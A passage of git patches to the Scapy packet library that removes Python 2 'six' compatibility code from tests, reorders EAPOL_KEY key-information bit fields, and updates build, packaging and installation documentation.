rand_obj.command() == "RandOID(fmt='1.2.3.0-28')" rand_obj = RandOID("1.2.3.0-28", depth=RandNumExpo(0.2), idnum=RandNumExpo(0.02)) @@ -61,7 +60,7 @@ assert rand_obj.command() == "RandOID(fmt='1.2.3.0-28', depth=RandNumExpo(lambd= random.seed(0x2807) rex = RandRegExp("[g-v]* @? [0-9]{3} . (g|v)") -bytes(rex) == ('vmuvr @ 906 \x9e g' if six.PY2 else b'irrtv @ 517 \xc2\xb8 v') +bytes(rex) == b'irrtv @ 517 \xc2\xb8 v' assert rex.command() == "RandRegExp(regexp='[g-v]* @? [0-9]{3} . (g|v)')" rex = RandRegExp("[:digit:][:space:][:word:]") @@ -84,7 +83,7 @@ rek = RandEnumKeys({'a': 1, 'b': 2, 'c': 3}, seed=0x2807) rek.enum.sort() assert rek.command() == "RandEnumKeys(enum=['a', 'b', 'c'], seed=10247)" r = str(rek) -assert r == ('c' if six.PY2 else 'a') +assert r == 'a' = RandSingNum random.seed(0x2807) @@ -95,13 +94,13 @@ assert rs.command() == "RandSingNum(mn=-28, mx=7)" = Rand* random.seed(0x2807) rss = RandSingString() -assert rss == ("CON:" if six.PY2 else "foo.exe:") +assert rss == "foo.exe:" assert rss.command() == "RandSingString()" random.seed(0x2807) rts = RandTermString(4, "scapy") assert sane(raw(rts)) in ["...Zscapy", "$#..scapy"] -assert rts.command() == "RandTermString(size=4, term=%s'scapy')" % '' if six.PY2 else 'b' +assert rts.command() == "RandTermString(size=4, term=b'scapy')" = RandInt (test __bool__) a = "True" if RandNum(False, True) else "False" @@ -120,7 +119,7 @@ assert rng._fix() == 8 assert rng.command() == "RandNumGauss(mu=1, sigma=42)" renum = RandEnum(1, 42, seed=0x2807) -assert renum == (13 if six.PY2 else 37) +assert renum == 37 assert renum.command() == "RandEnum(min=1, max=42, seed=10247)" rp = RandPool((IncrementalValue(), 42), (IncrementalValue(), 0)) diff --git a/test/regression.uts b/test/regression.uts index 6797ca7c6cb..d9a8ebfe27f 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -430,17 +430,7 @@ assert (ARP(ptype=0, pdst="hello. this isn't a valid IP")).route()[0] is None = plain_str test data = b"\xffsweet\xef celestia\xab" -if not six.PY2: - # Only Python 3 has to deal with Str/Bytes conversion, - # as we don't use Python 2's unicode - if sys.version_info[0:2] <= (3, 4): - # Python3.4 can only ignore unknown special characters - assert plain_str(data) == "sweet celestia" - else: - # Python >3.4 can replace them with a backslash representation - assert plain_str(data) == "\\xffsweet\\xef celestia\\xab" -else: - assert plain_str(data) == "\xffsweet\xef celestia\xab" +assert plain_str(data) == "\\xffsweet\\xef celestia\\xab" ############ ############ @@ -464,12 +454,12 @@ assert chb(1) == b"\x01" = Pickle and unpickle a packet -import scapy.libs.six as six +import pickle a = IP(dst="192.168.0.1")/UDP() -b = six.moves.cPickle.dumps(a) -c = six.moves.cPickle.loads(b) +b = pickle.dumps(a) +c = pickle.loads(b) assert c[IP].dst == "192.168.0.1" assert raw(c) == raw(a) @@ -485,15 +475,17 @@ except SystemExit: = Session test +import builtins + # This is automatic when using the console def get_var(var): - return six.moves.builtins.__dict__["scapy_session"][var] + return builtins.__dict__["scapy_session"][var] def set_var(var, value): - six.moves.builtins.__dict__["scapy_session"][var] = value + builtins.__dict__["scapy_session"][var] = value def del_var(var): - del six.moves.builtins.__dict__["scapy_session"][var] + del builtins.__dict__["scapy_session"][var] init_session(None, {"init_value": 123}) set_var("test_value", "8.8.8.8") # test_value = "8.8.8.8" @@ -1704,10 +1696,6 @@ def _test(): with no_debug_dissector(): ans,unans=sr(IP(dst="www.google.com/30")/TCP(dport=[80,443]), timeout=2) - # Backward compatibility: Python 2 only - if six.PY2: - exec("""ans.make_table(lambda (s, r): (s.dst, s.dport, r.sprintf("{TCP:%TCP.flags%}{ICMP:%ICMP.code%}")))""") - # New format: all Python versions ans.make_table(lambda s, r: (s.dst, s.dport, r.sprintf("{TCP:%TCP.flags%}{ICMP:%ICMP.code%}"))) @@ -2933,7 +2921,7 @@ def valid_output_read_routes6(routes): for destination, plen, next_hop, dev, cset, me in routes: if not in6_isvalid(destination) or not type(plen) == int: return False - if not in6_isvalid(next_hop) or not isinstance(dev, six.string_types): + if not in6_isvalid(next_hop) or not isinstance(dev, str): return False for address in cset: if not in6_isvalid(address): @@ -4059,7 +4047,7 @@ os.write(fd, b"-- MIB test\nscapy OBJECT IDENTIFIER ::= {test 2807}\n") os.close(fd) load_mib(fname) -assert sum(1 for k in six.itervalues(conf.mib.d) if "scapy" in k) == 1 +assert sum(1 for k in conf.mib.d.values() if "scapy" in k) == 1 assert sum(1 for oid in conf.mib) > 100 @@ -4739,7 +4727,7 @@ if PYX: = svgdump() print("PYX: %d" % PYX) -if PYX and not six.PY2: +if PYX: import tempfile import os filename = tempfile.mktemp(suffix=".svg") diff --git a/test/scapy/layers/inet.uts b/test/scapy/layers/inet.uts index e723c1bb2fd..e1131e95dbd 100644 --- a/test/scapy/layers/inet.uts +++ b/test/scapy/layers/inet.uts @@ -531,7 +531,7 @@ for x in ICMP(type=range(0,40),code=range(0,40)): (IP()/x).hashret() = IPv4 - traceroute utilities -ip_ttl = [("192.168.0.%d" % i, i) for i in six.moves.range(1, 10)] +ip_ttl = [("192.168.0.%d" % i, i) for i in range(1, 10)] tr_packets = [ (IP(dst="192.168.0.1", src="192.168.0.254", ttl=ttl)/TCP(options=[("Timestamp", "00:00:%.2d.00" % ttl)])/"scapy", IP(dst="192.168.0.254", src=ip)/ICMP(type=11)/IPerror(dst="192.168.0.1", src="192.168.0.254", ttl=0)/TCPerror()/"scapy") diff --git a/test/scapy/layers/inet6.uts b/test/scapy/layers/inet6.uts index 6c58051c759..c1b7cb8f120 100644 --- a/test/scapy/layers/inet6.uts +++ b/test/scapy/layers/inet6.uts @@ -240,7 +240,7 @@ in6_addrtomac("FE80::" + in6_mactoifaceid("FF:00:00:00:00:00", ulbit=0)) == 'ff: import socket -for a in six.moves.range(10): +for a in range(10): s1, s2 = in6_getRandomizedIfaceId('20b:93ff:feeb:2d3') s1, s2 tmp = inet_pton(socket.AF_INET6, "::" + s1)[8:] @@ -2832,7 +2832,7 @@ p[MIP6MH_BE].cksum=0xba10 and p[MIP6MH_BE].len == 1 and len(p[MIP6MH_BE].options + TracerouteResult6 = get_trace() -ip6_hlim = [("2001:db8::%d" % i, i) for i in six.moves.range(1, 12)] +ip6_hlim = [("2001:db8::%d" % i, i) for i in range(1, 12)] tr6_packets = [ (IPv6(dst="2001:db8::1", src="2001:db8::254", hlim=hlim)/UDP()/"scapy", IPv6(dst="2001:db8::254", src=ip)/ICMPv6TimeExceeded()/IPerror6(dst="2001:db8::1", src="2001:db8::254", hlim=0)/UDPerror()/"scapy") diff --git a/test/scapy/layers/lltd.uts b/test/scapy/layers/lltd.uts index bff8aa319b8..4fbe1f5c8b0 100644 --- a/test/scapy/layers/lltd.uts +++ b/test/scapy/layers/lltd.uts @@ -25,8 +25,8 @@ assert pkt.hashret()[2:] == b'\x00\x00' = Attribute build / dissection assert isinstance(LLTDAttribute(), LLTDAttribute) assert isinstance(LLTDAttribute(raw(LLTDAttribute())), LLTDAttribute) -assert all(isinstance(LLTDAttribute(type=i), LLTDAttribute) for i in six.moves.range(256)) -assert all(isinstance(LLTDAttribute(raw(LLTDAttribute(type=i))), LLTDAttribute) for i in six.moves.range(256)) +assert all(isinstance(LLTDAttribute(type=i), LLTDAttribute) for i in range(256)) +assert all(isinstance(LLTDAttribute(raw(LLTDAttribute(type=i))), LLTDAttribute) for i in range(256)) = Large TLV m1, m2, seq = RandMAC()._fix(), RandMAC()._fix(), 123 diff --git a/test/tls/tests_tls_netaccess.uts b/test/tls/tests_tls_netaccess.uts index e44f321afe8..6b6324a8396 100644 --- a/test/tls/tests_tls_netaccess.uts +++ b/test/tls/tests_tls_netaccess.uts @@ -23,8 +23,6 @@ import sys from contextlib import contextmanager from scapy.autorun import StringWriter -from scapy.libs import six - from scapy.config import conf from scapy.layers.tls.automaton_srv import TLSServerAutomaton diff --git a/tox.ini b/tox.ini index 34aa2a6525e..7703d100f99 100644 --- a/tox.ini +++ b/tox.ini @@ -98,7 +98,7 @@ commands = [testenv:mypy] description = "Check Scapy compliance against static typing" skip_install = true -deps = mypy==0.931 +deps = mypy==1.1.1 typing types-mock commands = python .config/mypy/mypy_check.py linux @@ -173,5 +173,4 @@ per-file-ignores = scapy/layers/tls/crypto/md4.py:E741 scapy/libs/winpcapy.py:F405,F403,E501 scapy/tools/UTscapy.py:E501 -exclude = scapy/libs/six.py, - scapy/libs/ethertypes.py +exclude = scapy/libs/ethertypes.py From ee7d0b47c8a53e98cb109add3eeaba66958b07c7 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 27 Mar 2023 02:17:21 +0200 Subject: [PATCH 1004/1632] Fix EAPOL_KEY --- scapy/layers/eap.py | 27 ++++++++++++--------------- test/scapy/layers/eap.uts | 7 ++++--- 2 files changed, 16 insertions(+), 18 deletions(-) diff --git a/scapy/layers/eap.py b/scapy/layers/eap.py index 64579888d1f..212b07a3bdc 100644 --- a/scapy/layers/eap.py +++ b/scapy/layers/eap.py @@ -441,22 +441,22 @@ class EAPOL_KEY(Packet): fields_desc = [ ByteEnumField("key_descriptor_type", 1, {1: "RC4", 2: "RSN"}), # Key Information + BitField("res2", 0, 2), + BitField("smk_message", 0, 1), + BitField("encrypted_key_data", 0, 1), + BitField("request", 0, 1), + BitField("error", 0, 1), + BitField("secure", 0, 1), + BitField("has_key_mic", 1, 1), + BitField("key_ack", 0, 1), + BitField("install", 0, 1), + BitField("res", 0, 2), + BitEnumField("key_type", 0, 1, {0: "Group/SMK", 1: "Pairwise"}), BitEnumField("key_descriptor_type_version", 0, 3, { 1: "HMAC-MD5+ARC4", 2: "HMAC-SHA1-128+AES-128", 3: "AES-128-CMAC+AES-128", }), - BitEnumField("key_type", 0, 1, {0: "Group/SMK", 1: "Pairwise"}), - BitField("res", 0, 2), - BitField("install", 0, 1), - BitField("key_ack", 0, 1), - BitField("has_key_mic", 1, 1), - BitField("secure", 0, 1), - BitField("error", 0, 1), - BitField("request", 0, 1), - BitField("encrypted_key_data", 0, 1), - BitField("smk_message", 0, 1), - BitField("res2", 0, 2), # LenField("len", None, "H"), LongField("key_replay_counter", 0), @@ -464,10 +464,7 @@ class EAPOL_KEY(Packet): XStrFixedLenField("key_iv", "", 16), XStrFixedLenField("key_rsc", "", 8), XStrFixedLenField("key_id", "", 8), - ConditionalField( - XStrFixedLenField("key_mic", "", 16), # XXX size can be 24 - lambda pkt: pkt.has_key_mic - ), + XStrFixedLenField("key_mic", "", 16), # XXX size can be 24 LenField("key_length", None, "H"), XStrLenField("key", "", length_from=lambda pkt: pkt.key_length) diff --git a/test/scapy/layers/eap.uts b/test/scapy/layers/eap.uts index 51616281781..4f0eeaa2b05 100644 --- a/test/scapy/layers/eap.uts +++ b/test/scapy/layers/eap.uts @@ -60,9 +60,10 @@ assert eapol.haslayer(EAP_FAST) s = b'\x08\x02:\x01\x00\xc0\xcab\xa4\xf6\x00"k\xfbI+\x00"k\xfbI+\xa0[\xaa\xaa\x03\x00\x00\x00\x88\x8e\x02\x03\x00u\x02\x00\x8a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x04\x95X{I5\':3\x8f\x90\xb1I\xae\x1f\xd7-"\x82\x1e\\$\xefC=\x83\x97?M\xd6\xdf>\x9b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x16\xdd\x14\x00\x0f\xac\x04\x03\xca?d\xca\xed\xdd\xef\xf69;\xefX\xd4\x97w' wifi = Dot11(s) assert wifi[EAPOL].key_descriptor_type == 2 -assert wifi[EAPOL].key_type == 0 -assert wifi[EAPOL].has_key_mic == 1 -assert wifi[EAPOL].encrypted_key_data == 1 +assert wifi[EAPOL].encrypted_key_data == 0 +assert wifi[EAPOL].key_ack == 1 +assert wifi[EAPOL].key_type == 1 +assert wifi[EAPOL].key_descriptor_type_version == 2 assert wifi[EAPOL].key_replay_counter == 4 assert wifi[EAPOL].key_mic == b"\x00" * 16 assert wifi[EAPOL].key_length == 22 From 96bf3878809521bed8eb137e665daa8b55249c90 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 11 Apr 2023 18:21:11 +0200 Subject: [PATCH 1005/1632] Support new build methods (#3958) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Build and check the wheel in the twine check as well It should help to make sure that scapy can be installed from PyPI (or any other package index) using pip and its sdist. The check switched to the "build" build frontend because it builds wheels from sdists by default: https://pypa-build.readthedocs.io/en/stable/#python--m-build * Remove README In 669506bd42e4141718374ba297974881fe125fb8 scapy switched to pyproject.toml where 'readme' is dynamic and should be supplied by setup.py. setup.py reads README.md and it works from inside the source tree but since README.md isn't included in the sdist it fails when pip or the build frontend builds the wheel from the sdist with: ``` distutils.errors.DistutilsOptionError: No configuration found for dynamic 'readme'. Some dynamic fields need to be specified via `tool.setuptools.dynamic` others must be specified via the equivalent attribute in `setup.py`. ``` This patch addresses that by removing README and letting setuptools include README.md to the sdist automatcially. README was added in 4f71027fcd in 2016 and back then it probably made sense because setuptools didn't include README.md in the sdist automatically. These days setuptools can handle README.md just fine so it's no longer necessary to keep README any more. It makes it possible to build the wheel from the sdist again. Fixes: ``` python3 -m build ... * Building wheel from sdist * Creating venv isolated environment... * Installing packages in isolated environment... (setuptools>=62.0.0) * Getting build dependencies for wheel... ... File "/tmp/build-env-vtaxy4xl/lib64/python3.11/site-packages/setuptools/config/pyprojecttoml.py", line 351, in _obtain_readme self._ensure_previously_set(dist, "readme") File "/tmp/build-env-vtaxy4xl/lib64/python3.11/site-packages/setuptools/config/pyprojecttoml.py", line 307, in _ensure_previously_set raise OptionError(msg) distutils.errors.DistutilsOptionError: No configuration found for dynamic 'readme'. Some dynamic fields need to be specified via `tool.setuptools.dynamic` others must be specified via the equivalent attribute in `setup.py`. ERROR Backend subprocess exited when trying to invoke get_requires_for_build_wheel ``` and ``` python3 -m pip install dist/scapy-2.5.0.dev56.tar.gz Processing ./dist/scapy-2.5.0.dev56.tar.gz Installing build dependencies ... done Getting requirements to build wheel ... error error: subprocess-exited-with-error × Getting requirements to build wheel did not run successfully. │ exit code: 1 ... ``` It's a follow-up to 669506bd42e4141718374ba297974881fe125fb8 * Update doc: installation & build instructions * Make sure VERSION is also exported in wheels * Cleanup MANIFEST.in * Add packaging instructions * Add git archive unit test * Use %(describe:tags=True) * Update doc/scapy/installation.rst Co-authored-by: Evgeny Vereshchagin --------- Co-authored-by: Evgeny Vereshchagin --- .github/workflows/unittests.yml | 2 + MANIFEST.in | 3 +- README | 1 - doc/scapy/development.rst | 37 +++++++-- doc/scapy/installation.rst | 129 ++++++++++++++------------------ pyproject.toml | 4 +- scapy/__init__.py | 20 +++-- setup.py | 41 +++++++++- tox.ini | 18 ++++- 9 files changed, 160 insertions(+), 95 deletions(-) delete mode 120000 README diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index 7c83984ea06..01835687ee8 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -29,6 +29,8 @@ jobs: run: tox -e spell - name: Run twine check run: tox -e twine + - name: Run gitarchive check + run: tox -e gitarchive docs: name: Build doc runs-on: ubuntu-latest diff --git a/MANIFEST.in b/MANIFEST.in index 27558eecff6..4ce295f4f62 100644 --- a/MANIFEST.in +++ b/MANIFEST.in @@ -1,5 +1,4 @@ include MANIFEST.in include LICENSE include run_scapy -include scapy/VERSION -recursive-exclude test * +prune test diff --git a/README b/README deleted file mode 120000 index 42061c01a1c..00000000000 --- a/README +++ /dev/null @@ -1 +0,0 @@ -README.md \ No newline at end of file diff --git a/doc/scapy/development.rst b/doc/scapy/development.rst index 1d590d3ad65..0ac03e3df48 100644 --- a/doc/scapy/development.rst +++ b/doc/scapy/development.rst @@ -300,10 +300,35 @@ publish the release:: Release Candidates (RC) could also be done. For example, the first RC will be tagged v2.4.3rc1 and the message ``2.4.3 Release Candidate #1``. -Prior to uploading the release to PyPi, the ``author_email`` in ``setup.py`` -must be changed to the address of the maintainer performing the release. The -following commands can then be used:: +Prior to uploading the release to PyPi, the mail address of the maintainer +performing the release must be added next to his name in ``pyproject.toml``. +See `this `_ for details. - python3 setup.py sdist - twine check dist/scapy-2.4.3.tar.gz - twine upload dist/scapy-2.4.3.tar.gz +The following commands can then be used:: + + pip install --upgrade build + python -m build + twine check dist/* + twine upload dist/* + +.. warning:: + Make sure that you don't have left-overs in your ``dist/`` folder ! There should only be the source and the wheel for the package. + Also check that the wheel ends in ``*-py3-none-any.whl`` ! + + +Packaging Scapy +=============== + +When packaging Scapy, you should build the source while setting the ``SCAPY_VERSION`` variable, in order to make sure that the version remains consistent. + +.. code:: bash + + $ SCAPY_VERSION=2.5.0 python3 -m build + ... + Successfully built scapy-2.5.0.tar.gz and scapy-2.5.0-py3-none-any.whl + +If you want to test Scapy while packaging it, you are encouraged to use the ``./run_tests`` script with no arguments. It will run a subset of the tests that don't use any external dependency, and will be easier to test. The only dependency is ``tox`` + +.. code:: bash + + $ ./test/run_tests diff --git a/doc/scapy/installation.rst b/doc/scapy/installation.rst index dbed7ee5fbb..afb687b1f51 100644 --- a/doc/scapy/installation.rst +++ b/doc/scapy/installation.rst @@ -7,7 +7,7 @@ Download and Installation Overview ======== - 0. Install `Python 2.7.X or 3.4+ `_. + 0. Install `Python 3.7+ `_. 1. `Download and install Scapy. <#installing-scapy-v2-x>`_ 2. `Follow the platform-specific instructions (dependencies) <#platform-specific-instructions>`_. 3. (Optional): `Install additional software for special features <#optional-software-for-special-features>`_. @@ -18,26 +18,19 @@ Each of these steps can be done in a different way depending on your platform an Scapy versions ============== -+---------------+----------------+------------+----------------+------------+------------+------------+------------------+ -| Scapy version | Python 2.2-2.6 | Python 2.7 | Python 3.4-3.6 | Python 3.7 | Python 3.8 | Python 3.9 | Python 3.10-3.11 | -+===============+================+============+================+============+============+============+==================+ -| 2.3.3 | ✅ | ✅ | ❌ | ❌ | ❌ | ❌ | ❌ | -+---------------+----------------+------------+----------------+------------+------------+------------+------------------+ -| 2.4.0 | ❌ | ✅ | ✅ | ❌ | ❌ | ❌ | ❌ | -+---------------+----------------+------------+----------------+------------+------------+------------+------------------+ -| 2.4.2 | ❌ | ✅ | ✅ | ✅ | ❌ | ❌ | ❌ | -+---------------+----------------+------------+----------------+------------+------------+------------+------------------+ -| 2.4.3-2.4.4 | ❌ | ✅ | ✅ | ✅ | ✅ | ❌ | ❌ | -+---------------+----------------+------------+----------------+------------+------------+------------+------------------+ -| 2.4.5 | ❌ | ✅ | ✅ | ✅ | ✅ | ✅ | ❌ | -+---------------+----------------+------------+----------------+------------+------------+------------+------------------+ -| 2.5.0 | ❌ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | -+---------------+----------------+------------+----------------+------------+------------+------------+------------------+ - -.. note:: - - In Scapy v2 use ``from scapy.all import *`` instead of ``from scapy import *``. +.. note:: Scapy 2.5.0 was the last version to support Python 2.7 ! ++------------------+-------+-------+--------+ +| Scapy version | 2.3.3 | 2.5.0 | >2.5.0 | ++==================+=======+=======+========+ +| Python 2.2-2.6 | ✅ | ❌ | ❌ | ++------------------+-------+-------+--------+ +| Python 2.7 | ✅ | ✅ | ❌ | ++------------------+-------+-------+--------+ +| Python 3.4-3.6 | ❌ | ✅ | ❌ | ++------------------+-------+-------+--------+ +| Python 3.7-3.11 | ❌ | ✅ | ✅ | ++------------------+-------+-------+--------+ Installing Scapy v2.x ===================== @@ -61,19 +54,21 @@ Latest release Use pip:: -$ pip install --pre scapy[basic] +$ pip install scapy -In fact, since 2.4.3, Scapy comes in 3 bundles: +.. + !! COMMENTED UNTIL NEXT RELEASE !! + Scapy specifies ``optional-dependencies`` so that you can install its optional dependencies directly through pip: -+----------+------------------------------------------+---------------------------------------+ -| Bundle | Contains | Pip command | -+==========+==========================================+=======================================+ -| Default | Only Scapy | ``pip install scapy`` | -+----------+------------------------------------------+---------------------------------------+ -| Basic | Scapy & IPython. **Highly recommended** | ``pip install --pre scapy[basic]`` | -+----------+------------------------------------------+---------------------------------------+ -| Complete | Scapy & all its main dependencies | ``pip install --pre scapy[complete]`` | -+----------+------------------------------------------+---------------------------------------+ + +----------+------------------------------------------+-----------------------------+ + | Bundle | Contains | Pip command | + +==========+==========================================+=============================+ + | Default | Only Scapy | ``pip install scapy`` | + +----------+------------------------------------------+-----------------------------+ + | CLI | Scapy & IPython. **Highly recommended** | ``pip install scapy[cli]`` | + +----------+------------------------------------------+-----------------------------+ + | All | Scapy & all its optional dependencies | ``pip install scapy[all]`` | + +----------+------------------------------------------+-----------------------------+ Current development version @@ -82,34 +77,29 @@ Current development version .. index:: single: Git, repository -If you always want the latest version with all new features and bugfixes, use Scapy's Git repository: +If you always want the latest version of Scapy with all new the features and bugfixes (but slightly less stable), you can install Scapy from its Git repository. -1. `Install the Git version control system `_. +.. note:: If you don't want to clone Scapy, you can install the development version in one line using:: -2. Check out a clone of Scapy's repository:: - - $ git clone https://github.com/secdev/scapy.git + $ pip install https://github.com/secdev/scapy/archive/refs/heads/master.zip -.. note:: - You can also download Scapy's `latest version `_ in a zip file:: +1. Check out a clone of Scapy's repository with `git `_:: - $ wget --trust-server-names https://github.com/secdev/scapy/archive/master.zip # or wget -O master.zip https://github.com/secdev/scapy/archive/master.zip - $ unzip master.zip - $ cd master + $ git clone https://github.com/secdev/scapy.git + $ cd scapy -3. Install Scapy in the standard `distutils `_ way:: +2. Install Scapy using `pip `_:: - $ cd scapy - $ sudo python setup.py install + $ pip install . -If you used Git, you can always update to the latest version afterwards:: +3. If you used Git, you can always update to the latest version afterwards:: $ git pull - $ sudo python setup.py install + $ pip install . .. note:: - You can run scapy without installing it using the ``run_scapy`` (unix) or ``run_scapy.bat`` (Windows) script or running it directly from the executable zip file (see the previous section). + You can run scapy without installing it using the ``run_scapy`` (unix) or ``run_scapy.bat`` (Windows) script. Optional Dependencies ===================== @@ -132,7 +122,7 @@ Here are the topics involved and some examples that you can use to try if your i * 2D graphics. ``psdump()`` and ``pdfdump()`` need `PyX `_ which in turn needs a LaTeX distribution: `texlive (Unix) `_ or `MikTex (Windows) `_. - Note: PyX requires version <=0.12.1 on Python 2.7. This means that on Python 2.7, it needs to be installed via ``pip install pyx==0.12.1``. Otherwise ``pip install pyx`` + You can install pyx using ``pip install pyx`` .. code-block:: python @@ -203,29 +193,29 @@ Linux native Scapy can run natively on Linux, without libpcap. -* Install `Python 2.7 or 3.4+ `_. -* Install `tcpdump `_ and make sure it is in the $PATH. (It's only used to compile BPF filters (``-ddd option``)) +* Install `Python 3.7+ `__. +* Install `libpcap `_. (By default it will only be used to compile BPF filters) * Make sure your kernel has Packet sockets selected (``CONFIG_PACKET``) * If your kernel is < 2.6, make sure that Socket filtering is selected ``CONFIG_FILTER``) Debian/Ubuntu/Fedora -------------------- -Make sure tcpdump is installed: +Make sure libpcap is installed: - Debian/Ubuntu: .. code-block:: text - $ sudo apt-get install tcpdump + $ sudo apt-get install libpcap-dev - Fedora: .. code-block:: text - $ yum install tcpdump + $ yum install libpcap-devel -Then install Scapy via ``pip`` or ``apt`` (bundled under ``python-scapy``) +Then install Scapy via ``pip`` or ``apt`` (bundled under ``python3-scapy``) All dependencies may be installed either via the platform-specific installer, or via PyPI. See `Optional Dependencies <#optional-dependencies>`_ for more information. @@ -278,7 +268,7 @@ In a similar manner, to install Scapy on OpenBSD 5.9+, you **may** want to insta .. code-block:: text - $ doas pkg_add libpcap tcpdump + $ doas pkg_add libpcap Then install Scapy via ``pip`` or ``pkg_add`` (bundled under ``python-scapy``) All dependencies may be installed either via the platform-specific installer, or via PyPI. See `Optional Dependencies <#optional-dependencies>`_ for more information. @@ -297,28 +287,23 @@ Solaris / SunOS requires ``libpcap`` (installed by default) to work. Windows ------- -.. sectionauthor:: Dirk Loss +You need to install Npcap in order to install Scapy on Windows (should also work with Winpcap, but unsupported nowadays): -Scapy is primarily being developed for Unix-like systems and works best on those platforms. But the latest version of Scapy supports Windows out-of-the-box. So you can use nearly all of Scapy's features on your Windows machine as well. + * Download link: `Npcap `_: `the latest version `_ + * During installation: + * we advise to turn **off** the ``Winpcap compatibility mode`` + * if you want to use your wifi card in monitor mode (if supported), make sure you enable the ``802.11`` option -.. image:: graphics/scapy-win-screenshot1.png - :scale: 80 - :align: center - -You need the following software in order to install Scapy on Windows: - - * `Python `_: `Python 2.7.X or 3.4+ `_. After installation, add the Python installation directory and its \Scripts subdirectory to your PATH. Depending on your Python version, the defaults would be ``C:\Python27`` and ``C:\Python27\Scripts`` respectively. - * `Npcap `_: `the latest version `_. Default values are recommended. Scapy will also work with Winpcap. - * `Scapy `_: `latest development version `_ from the `Git repository `_. Unzip the archive, open a command prompt in that directory and run ``python setup.py install``. - -Just download the files and run the setup program. Choosing the default installation options should be safe. (In the case of ``Npcap``, Scapy **will work** with ``802.11`` option enabled. You might want to make sure that this is ticked when installing). +Once that is done, you can `continue with Scapy's installation <#latest-release>`_. -After all packages are installed, open a command prompt (cmd.exe) and run Scapy by typing ``scapy``. If you have set the PATH correctly, this will find a little batch file in your ``C:\Python27\Scripts`` directory and instruct the Python interpreter to load Scapy. +You should then be able to open a ``cmd.exe`` and just call ``scapy``. If not, you probably haven't enabled the "Add Python to PATH" option when installing Python. You can follow the instructions `over here `_ to change that (or add it manually). -If really nothing seems to work, consider skipping the Windows version and using Scapy from a Linux Live CD -- either in a virtual machine on your Windows host or by booting from CDROM: An older version of Scapy is already included in grml and BackTrack for example. While using the Live CD you can easily upgrade to the latest Scapy version by using the `above installation methods <#installing-scapy-v2-x>`_. +Screenshots +^^^^^^^^^^^ -Screenshot -^^^^^^^^^^ +.. image:: graphics/scapy-win-screenshot1.png + :scale: 80 + :align: center .. image:: graphics/scapy-win-screenshot2.png :scale: 80 diff --git a/pyproject.toml b/pyproject.toml index 6ac3197697c..1c7fe8ce74c 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -47,8 +47,8 @@ changelog = "https://github.com/secdev/scapy/releases" scapy = "scapy.main:interact" [project.optional-dependencies] -basic = [ "ipython" ] -complete = [ +cli = [ "ipython" ] +all = [ "ipython", "pyx", "cryptography>=2.0", diff --git a/scapy/__init__.py b/scapy/__init__.py index 53cd99229cc..9ead5b81c04 100644 --- a/scapy/__init__.py +++ b/scapy/__init__.py @@ -40,12 +40,17 @@ def _version_from_git_archive(): """ Rely on git archive "export-subst" git attribute. See 'man gitattributes' for more details. - Note: describe is only supported with git >= 2.32.0 - but we use it to workaround GH#3121 + Note: describe is only supported with git >= 2.32.0, + and the `tags=true` option with git >= 2.35.0 but we + use it to workaround GH#3121. """ - git_archive_id = '$Format:%ct %(describe)$'.strip().split() + git_archive_id = '$Format:%ct %(describe:tags=true)$'.split() tstamp = git_archive_id[0] - tag = git_archive_id[1] + if len(git_archive_id) > 1: + tag = git_archive_id[1] + else: + # project is run in CI and has another %(describe) + tag = "" if "Format" in tstamp: raise ValueError('not a git archive') @@ -106,7 +111,7 @@ def _git(cmd): else: raise subprocess.CalledProcessError(process.returncode, err) - tag = _git("git describe --always") + tag = _git("git describe --tags --always --long") if not tag.startswith("v"): # Upstream was not fetched commit = _git("git rev-list --tags --max-count=1") @@ -120,12 +125,14 @@ def _version(): :return: the Scapy version """ + # Method 0: from external packaging try: # possibly forced by external packaging return os.environ['SCAPY_VERSION'] except KeyError: pass + # Method 1: from the VERSION file, included in sdist and wheels version_file = os.path.join(_SCAPY_PKG_DIR, 'VERSION') try: # file generated when running sdist @@ -135,16 +142,19 @@ def _version(): except FileNotFoundError: pass + # Method 2: from the archive tag, exported when using git archives try: return _version_from_git_archive() except ValueError: pass + # Method 3: from git itself, used when Scapy was cloned try: return _version_from_git_describe() except Exception: pass + # Fallback try: # last resort, use the modification date of __init__.py d = datetime.datetime.utcfromtimestamp(os.path.getmtime(__file__)) diff --git a/setup.py b/setup.py index e39245572e2..9869dc1ce9d 100755 --- a/setup.py +++ b/setup.py @@ -14,6 +14,7 @@ try: from setuptools import setup from setuptools.command.sdist import sdist + from setuptools.command.build_py import build_py except: raise ImportError("setuptools is required to install scapy !") @@ -37,6 +38,30 @@ def process_ignore_tags(buffer): return None +# Note: why do we bother including a 'scapy/VERSION' file and doing our +# own versioning stuff, instead of using more standard methods? +# Because it's all garbage. + +# If you remain fully standard, there's no way +# of adding the version dynamically, even less when using archives +# (currently, we're able to add the version anytime someone exports Scapy +# on github). + +# If you use setuptools_scm, you'll be able to have the git tag set into +# the wheel (therefore the metadata), that you can then retrieve using +# importlib.metadata, BUT it breaks sdist (source packages), as those +# don't include metadata. + + +def _build_version(path): + """ + This adds the scapy/VERSION file when creating a sdist and a wheel + """ + fn = os.path.join(path, 'scapy', 'VERSION') + with open(fn, 'w') as f: + f.write(__import__('scapy').VERSION) + + class SDist(sdist): """ Modified sdist to create scapy/VERSION file @@ -44,12 +69,20 @@ class SDist(sdist): def make_release_tree(self, base_dir, *args, **kwargs): super(SDist, self).make_release_tree(base_dir, *args, **kwargs) # ensure there's a scapy/VERSION file - fn = os.path.join(base_dir, 'scapy', 'VERSION') - with open(fn, 'w') as f: - f.write(__import__('scapy').VERSION) + _build_version(base_dir) + + +class BuildPy(build_py): + """ + Modified build_py to create scapy/VERSION file + """ + def build_package_data(self): + super(BuildPy, self).build_package_data() + # ensure 